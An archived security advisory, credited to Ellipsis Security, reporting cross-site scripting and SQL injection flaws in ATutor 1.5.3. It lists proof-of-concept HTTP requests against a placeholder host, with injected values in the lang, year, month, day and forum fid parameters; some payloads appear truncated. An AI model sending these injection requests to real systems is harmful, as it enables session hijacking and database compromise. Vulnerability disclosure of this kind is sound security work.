AOH :: Web :: Apps :: B06-3491.HTM

AOH :: Web :: Apps :: B06-3491.HTM
ATutor 1.5.3 Cross Site Scripting

ATutor 1.5.3 Cross Site Scripting ATutor 1.5.3 Cross Site Scripting


ATutor 1.5.3=0D
http://www.atutor.ca=0D 
--------------------------=0D
Cross Site Scripting (XSS)=0D
--------------------------=0D
=0D">http://target.xx/documentation/index_list.php?lang=">=0D 
---=0D
POST http://target.xx:80/registration.php?register=Register HTTP/1.0=0D 
Accept: */*=0D
Content-Type: application/x-www-form-urlencoded=0D
Host: target.xx=0D
ml=1&year=">=0D
---=0D
POST http://target.xx:80/registration.php?register=Register HTTP/1.0=0D 
Accept: */*=0D
Content-Type: application/x-www-form-urlencoded=0D
Host: target.xx=0D
ml=1&month=">=0D
---=0D
POST http://target.xx:80/registration.php?register=Register HTTP/1.0=0D 
Accept: */*=0D
Content-Type: application/x-www-form-urlencoded=0D
Host: target.xx=0D
ml=1&day=">=0D
-------------=0D
SQL injection=0D
-------------=0D
http://target.xx/forum/index.php?fid=-1[SQL]=0D 
-----------------=0D
Ellipsis Security=0D
http://www.ellsec.org

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better). Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.